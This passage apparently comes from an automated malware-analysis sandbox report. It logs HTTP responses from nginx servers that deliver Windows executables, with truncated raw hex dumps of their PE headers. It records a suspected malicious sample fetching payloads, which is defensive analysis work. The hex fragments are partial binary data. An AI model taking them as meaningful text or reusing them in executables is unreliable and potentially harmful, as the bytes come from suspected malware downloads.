00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:57 GMTContent-Type: application/x-msdos-programContent-Length: 652928Connection: closeLast-Modified: Tue, 04 Jan 2022 03:19:27 GMTETag: "9f680-5d4b91ad73cba"Accept-Ranges: bytesData Raw: 4d 5a 83 45 40 bf 97 ea c8 09 a0 7d ae 02 4a 24 d8 d9 e4 e3 cb 4d 61 da 45 b7 64 22 ab 6a 08 10 6d 8a 34 02 3b 25 dd 58 18 f0 de ee 92 1c e5 1f ec f6 60 81 4a a3 8d 01 6b f4 53 98 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d5 e7 d0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 02 1e 00 44 04 00 00 92 02 00 00 02 00 00 00 60 07 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 10 00 00 04 00 00 fa 06 0a 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 06 00 4c 01 00 00 00 20 06 00 94 31 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 10 06 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 94 31 01 00 00 20 06 00 94 31 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 d0 08 00 00 60 07 00 79 be 08 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:33:59 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:33:59 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:33:59 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:33:59 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:02 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:03 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:03 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:05 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:05 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:05 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:05 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 